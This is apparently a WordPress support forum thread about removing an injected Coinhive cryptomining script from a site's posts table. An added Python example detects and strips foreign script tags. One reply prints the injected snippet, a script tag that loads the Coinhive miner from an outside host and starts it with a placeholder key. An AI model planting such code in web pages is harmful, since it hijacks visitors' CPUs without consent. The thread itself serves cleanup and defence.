• After almost 10 years with no issues here on WordPress I have finally been hacked. My site showcases URLs to all kinds of spammy sites on the homepage (at the top and scroll to the bottom) https://bjwok.com

    I’m pretty keen to resolve this with the help of the community. Any assistance will be greatly appreciated!

    Cheers!


Viewing 15 replies - 31 through 45 (of 58 total)
  • You may need to check in your database postmeta tables as well.

    Thread Starter bjwok

    (@bjwok)

    Ok cools, will do

    FYI: I think the point of this particular script injection is to do cpu mining via Coinhive lol

    Thread Starter bjwok

    (@bjwok)

    Sounds too much for me lol!

    The reason this particular malware code evades detection is because the payload is remotely loaded when a user browses the page/user's browser compiles the page.

    The compiled code looks something like:

    <script src="https://coinhive.com/lib/coinhive.min.js"></script>
    <script> var miner = new CoinHive.Anonymous('XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX', { throttle: 0.2 });miner.start();</script>

    Which would most certainly be detected by malware scanners.

    My point here is, you can rest assured at least that this infection did not install rogue code into the browsers and devices of people that visited your website, rather it just utilised their CPU to mine some cryptocurrency (probably Monero) while they were viewing a webpage.

    Thread Starter bjwok

    (@bjwok)

    Interesting. I’m still stuck removing all instances of that code, despite checking in wp_postmeta. Check the linked image: it says there are no instances of that code, yet I still see it in source for random pages? Commercial Photography

    If not in the database, it will be in one of your website files.

    Thread Starter bjwok

    (@bjwok)

    Found them, there’s lots of instances of it inside wp_posts

    Now I just need to flex my php skills at removing them without breaking anything! Backing up the database first tho
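
An added example, not part of the original thread or any poster's code: one way to locate and strip injected `<script>` elements from exported `wp_posts` rows before writing them back. The thread does not show the markup actually stored in the database, so the sample rows reuse the compiled snippet quoted earlier; the `(ID, post_content)` row shape, the host allowlist, the `/js/site.js` path and all function names are assumptions.

```python
import re
from urllib.parse import urlparse

# Assumption: hosts allowed to serve scripts inside post bodies on this site.
ALLOWED_SCRIPT_HOSTS = {"bjwok.com", "www.bjwok.com"}

SCRIPT_RE = re.compile(r"<script\b([^>]*)>(.*?)</script\s*>", re.I | re.S)
SRC_RE = re.compile(r"""\bsrc\s*=\s*["']?([^"'\s>]+)""", re.I)

def classify(attrs, body):
    """Return a reason if a <script> element looks injected, else None."""
    src = SRC_RE.search(attrs)
    if src:
        host = (urlparse(src.group(1)).hostname or "").lower()
        if host and host not in ALLOWED_SCRIPT_HOSTS:
            return f"external script from {host}"
        return None
    if re.search(r"coinhive", body, re.I):
        return "inline miner start-up code"
    return None

def clean_post(content):
    """Strip flagged <script> elements; return (cleaned_content, reasons)."""
    reasons = []
    def strip_if_flagged(match):
        reason = classify(match.group(1), match.group(2))
        if reason is None:
            return match.group(0)  # leave legitimate markup untouched
        reasons.append(reason)
        return ""
    return SCRIPT_RE.sub(strip_if_flagged, content), reasons

def scan_posts(rows):
    """rows: (ID, post_content) pairs. Returns {ID: (cleaned, reasons)} for hits."""
    report = {}
    for post_id, content in rows:
        cleaned, reasons = clean_post(content)
        if reasons:
            report[post_id] = (cleaned, reasons)
    return report

# Constructed sample rows (not data from the thread's site).
SAMPLE_ROWS = [
    (101, '<p>Commercial Photography</p>'
          '<script src="https://coinhive.com/lib/coinhive.min.js"></script>'
          "<script> var miner = new CoinHive.Anonymous('XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX',"
          " { throttle: 0.2 });miner.start();</script>"),
    (102, '<p>Gallery</p><script src="https://www.bjwok.com/js/site.js"></script>'),
]
```

Run it against a database backup first and review the reported reasons per post ID before updating any row.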

    Well done.

    So in summary you have cleaned up the database, removed any extra rogue files added, reset the core WordPress files back to their original state, and reloaded a new set of plugins.

    The one thing left was to identify how it was that this attack took place. Without knowing exactly what version of WordPress you upgraded from we cannot fully eliminate outdated code as the source of the problem.

    Thread Starter bjwok

    (@bjwok)

    Thanks man, yeah that’s a good summary of how it all went down.

    My coding and skillsets are not enough to identify how it occurred in the first place so as long as I’ve taken the measures recommended to me I’m hoping I will be safe from any future attacks

    Feel free to trial my plugin (Pareto Security), set it to Advanced Mode, it may be able to catch the method the attackers use, therefore you can use that to prevent future attacks of the same kind.

    Also now's the time to take a complete snapshot of your website and database, just in case.

    Thread Starter bjwok

    (@bjwok)

    Awesome man, I just installed it

    Now, if I set to Advanced Mode will that have any odd issues with my eCommerce sales on these pages: https://www.bjwok.com/lightroomccpresets/lightroom-cc-presets-for-music-photographers/

    I’ve had some instances of plugins somehow disabling outgoing email purchase receipts…

    It will not interfere with outgoing email. But you could test it out as a guest user to make sure.

    Thread Starter bjwok

    (@bjwok)

    Ok, I’ll see how it goes. Thanks man.

  • The topic ‘Finally got hacked :( Oh no!!!’ is closed to new replies.